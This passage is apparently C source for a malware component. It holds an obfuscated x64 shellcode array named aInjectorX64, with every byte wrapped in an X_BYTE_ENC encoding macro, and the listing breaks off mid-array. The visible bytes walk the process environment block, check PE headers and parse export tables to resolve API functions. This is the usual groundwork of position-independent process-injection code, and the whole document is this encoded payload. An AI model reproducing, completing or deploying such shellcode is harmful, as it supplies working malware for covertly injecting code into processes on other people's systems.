BYTE aInjectorX64[1142] = {
  X_BYTE_ENC(0xE9,0x0000), X_BYTE_ENC(0x3C,0x0001), X_BYTE_ENC(0x02,0x0002), X_BYTE_ENC(0x00,0x0003),
  X_BYTE_ENC(0x00,0x0004), X_BYTE_ENC(0x48,0x0005), X_BYTE_ENC(0x85,0x0006), X_BYTE_ENC(0xC9,0x0007),
  X_BYTE_ENC(0x74,0x0008), X_BYTE_ENC(0x58,0x0009), X_BYTE_ENC(0x4C,0x000A), X_BYTE_ENC(0x8B,0x000B),
  X_BYTE_ENC(0xC9,0x000C), X_BYTE_ENC(0x48,0x000D), X_BYTE_ENC(0x85,0x000E), X_BYTE_ENC(0xD2,0x000F),
  X_BYTE_ENC(0x74,0x0010), X_BYTE_ENC(0x50,0x0011), X_BYTE_ENC(0x4D,0x0012), X_BYTE_ENC(0x85,0x0013),
  X_BYTE_ENC(0xC0,0x0014), X_BYTE_ENC(0x74,0x0015), X_BYTE_ENC(0x3E,0x0016), X_BYTE_ENC(0x66,0x0017),
  X_BYTE_ENC(0x41,0x0018), X_BYTE_ENC(0x8B,0x0019), X_BYTE_ENC(0x01,0x001A), X_BYTE_ENC(0x66,0x001B),
  X_BYTE_ENC(0x8B,0x001C), X_BYTE_ENC(0x0A,0x001D), X_BYTE_ENC(0x66,0x001E), X_BYTE_ENC(0x3B,0x001F),
  X_BYTE_ENC(0xC8,0x0020), X_BYTE_ENC(0x74,0x0021), X_BYTE_ENC(0x25,0x0022), X_BYTE_ENC(0x66,0x0023),
  X_BYTE_ENC(0x83,0x0024), X_BYTE_ENC(0xF8,0x0025), X_BYTE_ENC(0x41,0x0026), X_BYTE_ENC(0x72,0x0027),
  X_BYTE_ENC(0x06,0x0028), X_BYTE_ENC(0x66,0x0029), X_BYTE_ENC(0x83,0x002A), X_BYTE_ENC(0xF8,0x002B),
  X_BYTE_ENC(0x5A,0x002C), X_BYTE_ENC(0x76,0x002D), X_BYTE_ENC(0x0C,0x002E), X_BYTE_ENC(0x66,0x002F),
  X_BYTE_ENC(0x83,0x0030), X_BYTE_ENC(0xF8,0x0031), X_BYTE_ENC(0x61,0x0032), X_BYTE_ENC(0x72,0x0033),
  X_BYTE_ENC(0x2D,0x0034), X_BYTE_ENC(0x66,0x0035), X_BYTE_ENC(0x83,0x0036), X_BYTE_ENC(0xF8,0x0037),
  X_BYTE_ENC(0x7A,0x0038), X_BYTE_ENC(0x77,0x0039), X_BYTE_ENC(0x27,0x003A), X_BYTE_ENC(0x66,0x003B),
  X_BYTE_ENC(0x83,0x003C), X_BYTE_ENC(0xC8,0x003D), X_BYTE_ENC(0x20,0x003E), X_BYTE_ENC(0x66,0x003F),
  X_BYTE_ENC(0x83,0x0040), X_BYTE_ENC(0xC9,0x0041), X_BYTE_ENC(0x20,0x0042), X_BYTE_ENC(0x66,0x0043),
  X_BYTE_ENC(0x3B,0x0044), X_BYTE_ENC(0xC8,0x0045), X_BYTE_ENC(0x75,0x0046), X_BYTE_ENC(0x1A,0x0047),
  X_BYTE_ENC(0x49,0x0048), X_BYTE_ENC(0x83,0x0049), X_BYTE_ENC(0xC1,0x004A), X_BYTE_ENC(0x02,0x004B),
  X_BYTE_ENC(0x48,0x004C), X_BYTE_ENC(0x83,0x004D), X_BYTE_ENC(0xC2,0x004E), X_BYTE_ENC(0x02,0x004F),
  X_BYTE_ENC(0x49,0x0050), X_BYTE_ENC(0xFF,0x0051), X_BYTE_ENC(0xC8,0x0052), X_BYTE_ENC(0x75,0x0053),
  X_BYTE_ENC(0xC2,0x0054), X_BYTE_ENC(0x66,0x0055), X_BYTE_ENC(0x83,0x0056), X_BYTE_ENC(0x3A,0x0057),
  X_BYTE_ENC(0x00,0x0058), X_BYTE_ENC(0x75,0x0059), X_BYTE_ENC(0x07,0x005A), X_BYTE_ENC(0x48,0x005B),
  X_BYTE_ENC(0x33,0x005C), X_BYTE_ENC(0xC0,0x005D), X_BYTE_ENC(0x48,0x005E), X_BYTE_ENC(0xFF,0x005F),
  X_BYTE_ENC(0xC0,0x0060), X_BYTE_ENC(0xC3,0x0061), X_BYTE_ENC(0x48,0x0062), X_BYTE_ENC(0x33,0x0063),
  X_BYTE_ENC(0xC0,0x0064), X_BYTE_ENC(0xC3,0x0065), X_BYTE_ENC(0x48,0x0066), X_BYTE_ENC(0x85,0x0067),
  X_BYTE_ENC(0xC9,0x0068), X_BYTE_ENC(0x74,0x0069), X_BYTE_ENC(0x1E,0x006A), X_BYTE_ENC(0x48,0x006B),
  X_BYTE_ENC(0x85,0x006C), X_BYTE_ENC(0xD2,0x006D), X_BYTE_ENC(0x74,0x006E), X_BYTE_ENC(0x19,0x006F),
  X_BYTE_ENC(0x8A,0x0070), X_BYTE_ENC(0x01,0x0071), X_BYTE_ENC(0x3A,0x0072), X_BYTE_ENC(0x02,0x0073),
  X_BYTE_ENC(0x75,0x0074), X_BYTE_ENC(0x13,0x0075), X_BYTE_ENC(0x3C,0x0076), X_BYTE_ENC(0x00,0x0077),
  X_BYTE_ENC(0x74,0x0078), X_BYTE_ENC(0x08,0x0079), X_BYTE_ENC(0x48,0x007A), X_BYTE_ENC(0xFF,0x007B),
  X_BYTE_ENC(0xC1,0x007C), X_BYTE_ENC(0x48,0x007D), X_BYTE_ENC(0xFF,0x007E), X_BYTE_ENC(0xC2,0x007F),
  X_BYTE_ENC(0x75,0x0080), X_BYTE_ENC(0xEE,0x0081), X_BYTE_ENC(0x48,0x0082), X_BYTE_ENC(0x33,0x0083),
  X_BYTE_ENC(0xC0,0x0084), X_BYTE_ENC(0x48,0x0085), X_BYTE_ENC(0xFF,0x0086), X_BYTE_ENC(0xC0,0x0087),
  X_BYTE_ENC(0xC3,0x0088), X_BYTE_ENC(0x48,0x0089), X_BYTE_ENC(0x33,0x008A), X_BYTE_ENC(0xC0,0x008B),
  X_BYTE_ENC(0xC3,0x008C), X_BYTE_ENC(0x65,0x008D), X_BYTE_ENC(0x48,0x008E), X_BYTE_ENC(0x8B,0x008F),
  X_BYTE_ENC(0x04,0x0090), X_BYTE_ENC(0x25,0x0091), X_BYTE_ENC(0x30,0x0092), X_BYTE_ENC(0x00,0x0093),
  X_BYTE_ENC(0x00,0x0094), X_BYTE_ENC(0x00,0x0095), X_BYTE_ENC(0x48,0x0096), X_BYTE_ENC(0x8B,0x0097),
  X_BYTE_ENC(0x40,0x0098), X_BYTE_ENC(0x60,0x0099), X_BYTE_ENC(0xC3,0x009A), X_BYTE_ENC(0xE8,0x009B),
  X_BYTE_ENC(0xED,0x009C), X_BYTE_ENC(0xFF,0x009D), X_BYTE_ENC(0xFF,0x009E), X_BYTE_ENC(0xFF,0x009F),
  X_BYTE_ENC(0x48,0x00A0), X_BYTE_ENC(0x8B,0x00A1), X_BYTE_ENC(0x80,0x00A2), X_BYTE_ENC(0x10,0x00A3),
  X_BYTE_ENC(0x01,0x00A4), X_BYTE_ENC(0x00,0x00A5), X_BYTE_ENC(0x00,0x00A6), X_BYTE_ENC(0xC3,0x00A7),
  X_BYTE_ENC(0x48,0x00A8), X_BYTE_ENC(0x33,0x00A9), X_BYTE_ENC(0xC0,0x00AA), X_BYTE_ENC(0x48,0x00AB),
  X_BYTE_ENC(0x85,0x00AC), X_BYTE_ENC(0xC9,0x00AD), X_BYTE_ENC(0x74,0x00AE), X_BYTE_ENC(0x2B,0x00AF),
  X_BYTE_ENC(0x66,0x00B0), X_BYTE_ENC(0x81,0x00B1), X_BYTE_ENC(0x39,0x00B2), X_BYTE_ENC(0x4D,0x00B3),
  X_BYTE_ENC(0x5A,0x00B4), X_BYTE_ENC(0x75,0x00B5), X_BYTE_ENC(0x24,0x00B6), X_BYTE_ENC(0x4D,0x00B7),
  X_BYTE_ENC(0x33,0x00B8), X_BYTE_ENC(0xC0,0x00B9), X_BYTE_ENC(0x44,0x00BA), X_BYTE_ENC(0x8B,0x00BB),
  X_BYTE_ENC(0x41,0x00BC), X_BYTE_ENC(0x3C,0x00BD), X_BYTE_ENC(0x49,0x00BE), X_BYTE_ENC(0x03,0x00BF),
  X_BYTE_ENC(0xC8,0x00C0), X_BYTE_ENC(0x48,0x00C1), X_BYTE_ENC(0x85,0x00C2), X_BYTE_ENC(0xD2,0x00C3),
  X_BYTE_ENC(0x74,0x00C4), X_BYTE_ENC(0x03,0x00C5), X_BYTE_ENC(0x48,0x00C6), X_BYTE_ENC(0x89,0x00C7),
  X_BYTE_ENC(0x0A,0x00C8), X_BYTE_ENC(0x66,0x00C9), X_BYTE_ENC(0x81,0x00CA), X_BYTE_ENC(0x79,0x00CB),
  X_BYTE_ENC(0x04,0x00CC), X_BYTE_ENC(0x64,0x00CD), X_BYTE_ENC(0x86,0x00CE), X_BYTE_ENC(0x75,0x00CF),
  X_BYTE_ENC(0x0A,0x00D0), X_BYTE_ENC(0x66,0x00D1), X_BYTE_ENC(0x81,0x00D2), X_BYTE_ENC(0x39,0x00D3),
  X_BYTE_ENC(0x50,0x00D4), X_BYTE_ENC(0x45,0x00D5), X_BYTE_ENC(0x75,0x00D6), X_BYTE_ENC(0x03,0x00D7),
  X_BYTE_ENC(0x48,0x00D8), X_BYTE_ENC(0xFF,0x00D9), X_BYTE_ENC(0xC0,0x00DA), X_BYTE_ENC(0xC3,0x00DB),
  X_BYTE_ENC(0x48,0x00DC), X_BYTE_ENC(0x89,0x00DD), X_BYTE_ENC(0x4C,0x00DE), X_BYTE_ENC(0x24,0x00DF),
  X_BYTE_ENC(0x08,0x00E0), X_BYTE_ENC(0x48,0x00E1), X_BYTE_ENC(0x83,0x00E2), X_BYTE_ENC(0xEC,0x00E3),
  X_BYTE_ENC(0x48,0x00E4), X_BYTE_ENC(0xE8,0x00E5), X_BYTE_ENC(0xA3,0x00E6), X_BYTE_ENC(0xFF,0x00E7),
  X_BYTE_ENC(0xFF,0x00E8), X_BYTE_ENC(0xFF,0x00E9), X_BYTE_ENC(0x48,0x00EA), X_BYTE_ENC(0x8B,0x00EB),
  X_BYTE_ENC(0x40,0x00EC), X_BYTE_ENC(0x18,0x00ED), X_BYTE_ENC(0x48,0x00EE), X_BYTE_ENC(0x85,0x00EF),
  X_BYTE_ENC(0xC0,0x00F0), X_BYTE_ENC(0x74,0x00F1), X_BYTE_ENC(0x56,0x00F2), X_BYTE_ENC(0x83,0x00F3),
  X_BYTE_ENC(0x78,0x00F4), X_BYTE_ENC(0x04,0x00F5), X_BYTE_ENC(0x00,0x00F6), X_BYTE_ENC(0x74,0x00F7),
  X_BYTE_ENC(0x50,0x00F8), X_BYTE_ENC(0x4C,0x00F9), X_BYTE_ENC(0x8B,0x00FA), X_BYTE_ENC(0xD0,0x00FB),
  X_BYTE_ENC(0x49,0x00FC), X_BYTE_ENC(0x83,0x00FD), X_BYTE_ENC(0xC2,0x00FE), X_BYTE_ENC(0x10,0x00FF),
  X_BYTE_ENC(0x49,0x0100), X_BYTE_ENC(0x8B,0x0101), X_BYTE_ENC(0x1A,0x0102), X_BYTE_ENC(0x49,0x0103),
  X_BYTE_ENC(0x3B,0x0104), X_BYTE_ENC(0xDA,0x0105), X_BYTE_ENC(0x74,0x0106), X_BYTE_ENC(0x41,0x0107),
  X_BYTE_ENC(0x4C,0x0108), X_BYTE_ENC(0x0F,0x0109), X_BYTE_ENC(0xB7,0x010A), X_BYTE_ENC(0x43,0x010B),
  X_BYTE_ENC(0x58,0x010C), X_BYTE_ENC(0x4D,0x010D), X_BYTE_ENC(0x85,0x010E), X_BYTE_ENC(0xC0,0x010F),
  X_BYTE_ENC(0x74,0x0110), X_BYTE_ENC(0x32,0x0111), X_BYTE_ENC(0x49,0x0112), X_BYTE_ENC(0xD1,0x0113),
  X_BYTE_ENC(0xE8,0x0114), X_BYTE_ENC(0x48,0x0115), X_BYTE_ENC(0x8B,0x0116), X_BYTE_ENC(0x4B,0x0117),
  X_BYTE_ENC(0x60,0x0118), X_BYTE_ENC(0x48,0x0119), X_BYTE_ENC(0x85,0x011A), X_BYTE_ENC(0xC9,0x011B),
  X_BYTE_ENC(0x74,0x011C), X_BYTE_ENC(0x26,0x011D), X_BYTE_ENC(0x48,0x011E), X_BYTE_ENC(0x8B,0x011F),
  X_BYTE_ENC(0x54,0x0120), X_BYTE_ENC(0x24,0x0121), X_BYTE_ENC(0x50,0x0122), X_BYTE_ENC(0xE8,0x0123),
  X_BYTE_ENC(0xDD,0x0124), X_BYTE_ENC(0xFE,0x0125), X_BYTE_ENC(0xFF,0x0126), X_BYTE_ENC(0xFF,0x0127),
  X_BYTE_ENC(0x48,0x0128), X_BYTE_ENC(0x85,0x0129), X_BYTE_ENC(0xC0,0x012A), X_BYTE_ENC(0x74,0x012B),
  X_BYTE_ENC(0x17,0x012C), X_BYTE_ENC(0x48,0x012D), X_BYTE_ENC(0x8B,0x012E), X_BYTE_ENC(0x4B,0x012F),
  X_BYTE_ENC(0x30,0x0130), X_BYTE_ENC(0x48,0x0131), X_BYTE_ENC(0x33,0x0132), X_BYTE_ENC(0xD2,0x0133),
  X_BYTE_ENC(0xE8,0x0134), X_BYTE_ENC(0x6F,0x0135), X_BYTE_ENC(0xFF,0x0136), X_BYTE_ENC(0xFF,0x0137),
  X_BYTE_ENC(0xFF,0x0138), X_BYTE_ENC(0x48,0x0139), X_BYTE_ENC(0x85,0x013A), X_BYTE_ENC(0xC0,0x013B),
  X_BYTE_ENC(0x74,0x013C), X_BYTE_ENC(0x06,0x013D), X_BYTE_ENC(0x48,0x013E), X_BYTE_ENC(0x8B,0x013F),
  X_BYTE_ENC(0x43,0x0140), X_BYTE_ENC(0x30,0x0141), X_BYTE_ENC(0xEB,0x0142), X_BYTE_ENC(0x08,0x0143),
  X_BYTE_ENC(0x48,0x0144), X_BYTE_ENC(0x8B,0x0145), X_BYTE_ENC(0x1B,0x0146), X_BYTE_ENC(0xEB,0x0147),
  X_BYTE_ENC(0xBA,0x0148), X_BYTE_ENC(0x48,0x0149), X_BYTE_ENC(0x33,0x014A), X_BYTE_ENC(0xC0,0x014B),
  X_BYTE_ENC(0x48,0x014C), X_BYTE_ENC(0x83,0x014D), X_BYTE_ENC(0xC4,0x014E), X_BYTE_ENC(0x48,0x014F),
  X_BYTE_ENC(0xC3,0x0150), X_BYTE_ENC(0x48,0x0151), X_BYTE_ENC(0x89,0x0152), X_BYTE_ENC(0x4C,0x0153),
  X_BYTE_ENC(0x24,0x0154), X_BYTE_ENC(0x08,0x0155), X_BYTE_ENC(0x48,0x0156), X_BYTE_ENC(0x89,0x0157),
  X_BYTE_ENC(0x54,0x0158), X_BYTE_ENC(0x24,0x0159), X_BYTE_ENC(0x10,0x015A), X_BYTE_ENC(0x48,0x015B),
  X_BYTE_ENC(0x83,0x015C), X_BYTE_ENC(0xEC,0x015D), X_BYTE_ENC(0x60,0x015E), X_BYTE_ENC(0x41,0x015F),
  X_BYTE_ENC(0x55,0x0160), X_BYTE_ENC(0x48,0x0161), X_BYTE_ENC(0x85,0x0162), X_BYTE_ENC(0xD2,0x0163),
  X_BYTE_ENC(0x0F,0x0164), X_BYTE_ENC(0x84,0x0165), X_BYTE_ENC(0xCD,0x0166), X_BYTE_ENC(0x00,0x0167),
  X_BYTE_ENC(0x00,0x0168), X_BYTE_ENC(0x00,0x0169), X_BYTE_ENC(0x48,0x016A), X_BYTE_ENC(0x85,0x016B),
  X_BYTE_ENC(0xC9,0x016C), X_BYTE_ENC(0x0F,0x016D), X_BYTE_ENC(0x84,0x016E), X_BYTE_ENC(0xC4,0x016F),
  X_BYTE_ENC(0x00,0x0170), X_BYTE_ENC(0x00,0x0171), X_BYTE_ENC(0x00,0x0172), X_BYTE_ENC(0x48,0x0173),
  X_BYTE_ENC(0x8D,0x0174), X_BYTE_ENC(0x54,0x0175), X_BYTE_ENC(0x24,0x0176), X_BYTE_ENC(0x20,0x0177),
  X_BYTE_ENC(0xE8,0x0178), X_BYTE_ENC(0x2B,0x0179), X_BYTE_ENC(0xFF,0x017A), X_BYTE_ENC(0xFF,0x017B),
  X_BYTE_ENC(0xFF,0x017C), X_BYTE_ENC(0x48,0x017D), X_BYTE_ENC(0x85,0x017E), X_BYTE_ENC(0xC0,0x017F),
  X_BYTE_ENC(0x0F,0x0180), X_BYTE_ENC(0x84,0x0181), X_BYTE_ENC(0xB1,0x0182), X_BYTE_ENC(0x00,0x0183),
  X_BYTE_ENC(0x00,0x0184), X_BYTE_ENC(0x00,0x0185), X_BYTE_ENC(0x48,0x0186), X_BYTE_ENC(0x8B,0x0187),
  X_BYTE_ENC(0x44,0x0188), X_BYTE_ENC(0x24,0x0189), X_BYTE_ENC(0x20,0x018A), X_BYTE_ENC(0x83,0x018B),
  X_BYTE_ENC(0xB8,0x018C), X_BYTE_ENC(0x8C,0x018D), X_BYTE_ENC(0x00,0x018E), X_BYTE_ENC(0x00,0x018F),
  X_BYTE_ENC(0x00,0x0190), X_BYTE_ENC(0x00,0x0191), X_BYTE_ENC(0x0F,0x0192), X_BYTE_ENC(0x84,0x0193),
  X_BYTE_ENC(0x9F,0x0194), X_BYTE_ENC(0x00,0x0195), X_BYTE_ENC(0x00,0x0196), X_BYTE_ENC(0x00,0x0197),
  X_BYTE_ENC(0x4D,0x0198), X_BYTE_ENC(0x33,0x0199), X_BYTE_ENC(0xC0,0x019A), X_BYTE_ENC(0x44,0x019B),
  X_BYTE_ENC(0x8B,0x019C), X_BYTE_ENC(0x80,0x019D), X_BYTE_ENC(0x88,0x019E), X_BYTE_ENC(0x00,0x019F),
  X_BYTE_ENC(0x00,0x01A0), X_BYTE_ENC(0x00,0x01A1), X_BYTE_ENC(0x45,0x01A2), X_BYTE_ENC(0x85,0x01A3),
  X_BYTE_ENC(0xC0,0x01A4), X_BYTE_ENC(0x0F,0x01A5), X_BYTE_ENC(0x84,0x01A6), X_BYTE_ENC(0x8C,0x01A7),
  X_BYTE_ENC(0x00,0x01A8), X_BYTE_ENC(0x00,0x01A9), X_BYTE_ENC(0x00,0x01AA), X_BYTE_ENC(0x4C,0x01AB),
  X_BYTE_ENC(0x03,0x01AC), X_BYTE_ENC(0x44,0x01AD), X_BYTE_ENC(0x24,0x01AE), X_BYTE_ENC(0x70,0x01AF),
  X_BYTE_ENC(0x48,0x01B0), X_BYTE_ENC(0x33,0x01B1), X_BYTE_ENC(0xC0,0x01B2), X_BYTE_ENC(0x41,0x01B3),
  X_BYTE_ENC(0x8B,0x01B4), X_BYTE_ENC(0x40,0x01B5), X_BYTE_ENC(0x18,0x01B6), X_BYTE_ENC(0x48,0x01B7),
  X_BYTE_ENC(0x89,0x01B8), X_BYTE_ENC(0x44,0x01B9), X_BYTE_ENC(0x24,0x01BA), X_BYTE_ENC(0x28,0x01BB),
  X_BYTE_ENC(0x48,0x01BC), X_BYTE_ENC(0x33,0x01BD), X_BYTE_ENC(0xC0,0x01BE), X_BYTE_ENC(0x41,0x01BF),
  X_BYTE_ENC(0x8B,0x01C0), X_BYTE_ENC(0x40,0x01C1), X_BYTE_ENC(0x20,0x01C2), X_BYTE_ENC(0x48,0x01C3),
  X_BYTE_ENC(0x03,0x01C4), X_BYTE_ENC(0x44,0x01C5), X_BYTE_ENC(0x24,0x01C6), X_BYTE_ENC(0x70,0x01C7),
  X_BYTE_ENC(0x48,0x01C8), X_BYTE_ENC(0x89,0x01C9), X_BYTE_ENC(0x44,0x01CA), X_BYTE_ENC(0x24,0x01CB),
  X_BYTE_ENC(0x30,0x01CC), X_BYTE_ENC(0x4D,0x01CD), X_BYTE_ENC(0x33,0x01CE), X_BYTE_ENC(0xED,0x01CF),
  X_BYTE_ENC(0x4C,0x01D0), X_BYTE_ENC(0x3B,0x01D1), X_BYTE_ENC(0x6C,0x01D2), X_BYTE_ENC(0x24,0x01D3),
  X_BYTE_ENC(0x28,0x01D4), X_BYTE_ENC(0x73,0x01D5), X_BYTE_ENC(0x60,0x01D6), X_BYTE_ENC(0x48,0x01D7),
  X_BYTE_ENC(0x8B,0x01D8), X_BYTE_ENC(0x54,0x01D9), X_BYTE_ENC(0x24,0x01DA), X_BYTE_ENC(0x78,0x01DB),
  X_BYTE_ENC(0x48,0x01DC), X_BYTE_ENC(0x8B,0x01DD), X_BYTE_ENC(0x44,0x01DE), X_BYTE_ENC(0x24,0x01DF),
  X_BYTE_ENC(0x30,0x01E0), X_BYTE_ENC(0x48,0x01E1), X_BYTE_ENC(0x33,0x01E2), X_BYTE_ENC(0xC9,0x01E3),
  X_BYTE_ENC(0x8B,0x01E4), X_BYTE_ENC(0x08,0x01E5), X_BYTE_ENC(0x48,0x01E6), X_BYTE_ENC(0x03,0x01E7),
  X_BYTE_ENC(0x4C,0x01E8), X_BYTE_ENC(0x24,0x01E9), X_BYTE_ENC(0x70,0x01EA), X_BYTE_ENC(0xE8,0x01EB),
  X_BYTE_ENC(0x76,0x01EC), X_BYTE_ENC(0xFE,0x01ED), X_BYTE_ENC(0xFF,0x01EE), X_BYTE_ENC(0xFF,0x01EF),
  X_BYTE_ENC(0x48,0x01F0), X_BYTE_ENC(0x85,0x01F1), X_BYTE_ENC(0xC0,0x01F2), X_BYTE_ENC(0x74,0x01F3),
  X_BYTE_ENC(0x37,0x01F4), X_BYTE_ENC(0x48,0x01F5), X_BYTE_ENC(0x33,0x01F6), X_BYTE_ENC(0xC0,0x01F7),
  X_BYTE_ENC(0x41,0x01F8), X_BYTE_ENC(0x8B,0x01F9), X_BYTE_ENC(0x40,0x01FA), X_BYTE_ENC(0x24,0x01FB),
  X_BYTE_ENC(0x48,0x01FC), X_BYTE_ENC(0x03,0x01FD), X_BYTE_ENC(0x44,0x01FE), X_BYTE_ENC(0x24,0x01FF),
  X_BYTE_ENC(0x70,0x0200), X_BYTE_ENC(0x49,0x0201), X_BYTE_ENC(0xD1,0x0202), X_BYTE_ENC(0xE5,0x0203),
  X_BYTE_ENC(0x49,0x0204), X_BYTE_ENC(0x03,0x0205), X_BYTE_ENC(0xC5,0x0206), X_BYTE_ENC(0x48,0x0207),
  X_BYTE_ENC(0x33,0x0208), X_BYTE_ENC(0xC9,0x0209), X_BYTE_ENC(0x66,0x020A), X_BYTE_ENC(0x8B,0x020B),
  X_BYTE_ENC(0x08,0x020C), X_BYTE_ENC(0x48,0x020D), X_BYTE_ENC(0x33,0x020E), X_BYTE_ENC(0xC0,0x020F),
  X_BYTE_ENC(0x41,0x0210), X_BYTE_ENC(0x8B,0x0211), X_BYTE_ENC(0x40,0x0212), X_BYTE_ENC(0x1C,0x0213),
  X_BYTE_ENC(0x48,0x0214), X_BYTE_ENC(0x03,0x0215), X_BYTE_ENC(0x44,0x0216), X_BYTE_ENC(0x24,0x0217),
  X_BYTE_ENC(0x70,0x0218), X_BYTE_ENC(0x48,0x0219), X_BYTE_ENC(0xC1,0x021A), X_BYTE_ENC(0xE1,0x021B),
  X_BYTE_ENC(0x02,0x021C), X_BYTE_ENC(0x48,0x021D), X_BYTE_ENC(0x03,0x021E), X_BYTE_ENC(0xC8,0x021F),
  X_BYTE_ENC(0x48,0x0220), X_BYTE_ENC(0x33,0x0221), X_BYTE_ENC(0xC0,0x0222), X_BYTE_ENC(0x8B,0x0223),
  X_BYTE_ENC(0x01,0x0224), X_BYTE_ENC(0x48,0x0225), X_BYTE_ENC(0x03,0x0226), X_BYTE_ENC(0x44,0x0227),
  X_BYTE_ENC(0x24,0x0228), X_BYTE_ENC(0x70,0x0229), X_BYTE_ENC(0xEB,0x022A), X_BYTE_ENC(0x0E,0x022B),
  X_BYTE_ENC(0x48,0x022C), X_BYTE_ENC(0x83,0x022D), X_BYTE_ENC(0x44,0x022E), X_BYTE_ENC(0x24,0x022F),
  X_BYTE_ENC(0x30,0x0230), X_BYTE_ENC(0x04,0x0231), X_BYTE_ENC(0x49,0x0232), X_BYTE_ENC(0xFF,0x0233),
  X_BYTE_ENC(0xC5,0x0234), X_BYTE_ENC(0xEB,0x0235), X_BYTE_ENC(0x99,0x0236), X_BYTE_ENC(0x48,0x0237),
  X_BYTE_ENC(0x33,0x0238), X_BYTE_ENC(0xC0,0x0239), X_BYTE_ENC(0x41,0x023A), X_BYTE_ENC(0x5D,0x023B),
  X_BYTE_ENC(0x48,0x023C), X_BYTE_ENC(0x83,0x023D), X_BYTE_ENC(0xC4,0x023E), X_BYTE_ENC(0x60,0x023F),
  X_BYTE_ENC(0xC3,0x0240), X_BYTE_ENC(0x48,0x0241), X_BYTE_ENC(0x89,0x0242), X_BYTE_ENC(0x4C,0x0243),
  X_BYTE_ENC(0x24,0x0244), X_BYTE_ENC(0x08,0x0245), X_BYTE_ENC(0x48,0x0246), X_BYTE_ENC(0x81,0x0247),
  X_BYTE_ENC(0xEC,0x0248), X_BYTE_ENC(0x98,0x0249), X_BYTE_ENC(0x00,0x024A), X_BYTE_ENC(0x00,0x024B),
  X_BYTE_ENC(0x00,0x024C), X_BYTE_ENC(0x48,0x024D), X_BYTE_ENC(0x33,0x024E), X_BYTE_ENC(0xC0,0x024F),
  X_BYTE_ENC(0x48,0x0250), X_BYTE_ENC(0x89,0x0251), X_BYTE_ENC(0x44,0x0252), X_BYTE_ENC(0x24,0x0253),
  X_BYTE_ENC(0x38,0x0254), X_BYTE_ENC(0x48,0x0255), X_BYTE_ENC(0x8D,0x0256), X_BYTE_ENC(0x05,0x0257),
  X_BYTE_ENC(0xCC,0x0258), X_BYTE_ENC(0x01,0x0259), X_BYTE_ENC(0x00,0x025A), X_BYTE_ENC(0x00,0x025B),
  X_BYTE_ENC(0x48,0x025C), X_BYTE_ENC(0x8B,0x025D), X_BYTE_ENC(0xC8,0x025E), X_BYTE_ENC(0xE8,0x025F),
  X_BYTE_ENC(0x78,0x0260), X_BYTE_ENC(0xFE,0x0261), X_BYTE_ENC(0xFF,0x0262), X_BYTE_ENC(0xFF,0x0263),
  X_BYTE_ENC(0x48,0x0264), X_BYTE_ENC(0x89,0x0265), X_BYTE_ENC(0x44,0x0266), X_BYTE_ENC(0x24,0x0267),
  X_BYTE_ENC(0x20,0x0268), X_BYTE_ENC(0x48,0x0269), X_BYTE_ENC(0x85,0x026A), X_BYTE_ENC(0xC0,0x026B),
  X_BYTE_ENC(0x74,0x026C), X_BYTE_ENC(0x5A,0x026D), X_BYTE_ENC(0x48,0x026E), X_BYTE_ENC(0x8D,0x026F),
  X_BYTE_ENC(0x05,0x0270), X_BYTE_ENC(0xC7,0x0271), X_BYTE_ENC(0x01,0x0272), X_BYTE_ENC(0x00,0x0273),
  X_BYTE_ENC(0x00,0x0274), X_BYTE_ENC(0x48,0x0275), X_BYTE_ENC(0x8B,0x0276), X_BYTE_ENC(0xD0,0x0277),
  X_BYTE_ENC(0x48,0x0278), X_BYTE_ENC(0x8B,0x0279), X_BYTE_ENC(0x4C,0x027A), X_BYTE_ENC(0x24,0x027B),
  X_BYTE_ENC(0x20,0x027C), X_BYTE_ENC(0xE8,0x027D), X_BYTE_ENC(0xCF,0x027E), X_BYTE_ENC(0xFE,0x027F),
  X_BYTE_ENC(0xFF,0x0280), X_BYTE_ENC(0xFF,0x0281), X_BYTE_ENC(0x48,0x0282), X_BYTE_ENC(0x89,0x0283),
  X_BYTE_ENC(0x44,0x0284), X_BYTE_ENC(0x24,0x0285), X_BYTE_ENC(0x28,0x0286), X_BYTE_ENC(0x48,0x0287),
  X_BYTE_ENC(0x85,0x0288), X_BYTE_ENC(0xC0,0x0289), X_BYTE_ENC(0x74,0x028A), X_BYTE_ENC(0x3C,0x028B),
  X_BYTE_ENC(0x48,0x028C), X_BYTE_ENC(0x8D,0x028D), X_BYTE_ENC(0x05,0x028E), X_BYTE_ENC(0xB4,0x028F),
  X_BYTE_ENC(0x01,0x0290), X_BYTE_ENC(0x00,0x0291), X_BYTE_ENC(0x00,0x0292), X_BYTE_ENC(0x48,0x0293),
  X_BYTE_ENC(0x8B,0x0294), X_BYTE_ENC(0xD0,0x0295), X_BYTE_ENC(0x48,0x0296), X_BYTE_ENC(0x8B,0x0297),
  X_BYTE_ENC(0x4C,0x0298), X_BYTE_ENC(0x24,0x0299), X_BYTE_ENC(0x20,0x029A), X_BYTE_ENC(0xE8,0x029B),
  X_BYTE_ENC(0xB1,0x029C), X_BYTE_ENC(0xFE,0x029D), X_BYTE_ENC(0xFF,0x029E), X_BYTE_ENC(0xFF,0x029F),
  X_BYTE_ENC(0x48,0x02A0), X_BYTE_ENC(0x89,0x02A1), X_BYTE_ENC(0x44,0x02A2), X_BYTE_ENC(0x24,0x02A3),
  X_BYTE_ENC(0x30,0x02A4), X_BYTE_ENC(0x48,0x02A5), X_BYTE_ENC(0x85,0x02A6), X_BYTE_ENC(0xC0,0x02A7),
  X_BYTE_ENC(0x74,0x02A8), X_BYTE_ENC(0x1E,0x02A9), X_BYTE_ENC(0x48,0x02AA), X_BYTE_ENC(0x8D,0x02AB),
  X_BYTE_ENC(0x05,0x02AC), X_BYTE_ENC(0xA3,0x02AD), X_BYTE_ENC(0x01,0x02AE), X_BYTE_ENC(0x00,0x02AF),
  X_BYTE_ENC(0x00,0x02B0), X_BYTE_ENC(0x48,0x02B1), X_BYTE_ENC(0x8B,0x02B2), X_BYTE_ENC(0xD0,0x02B3),
  X_BYTE_ENC(0x48,0x02B4), X_BYTE_ENC(0x8B,0x02B5), X_BYTE_ENC(0x4C,0x02B6), X_BYTE_ENC(0x24,0x02B7),
  X_BYTE_ENC(0x20,0x02B8), X_BYTE_ENC(0xE8,0x02B9), X_BYTE_ENC(0x93,0x02BA), X_BYTE_ENC(0xFE,0x02BB),
  X_BYTE_ENC(0xFF,0x02BC), X_BYTE_ENC(0xFF,0x02BD), X_BYTE_ENC(0x48,0x02BE), X_BYTE_ENC(0x89,0x02BF),
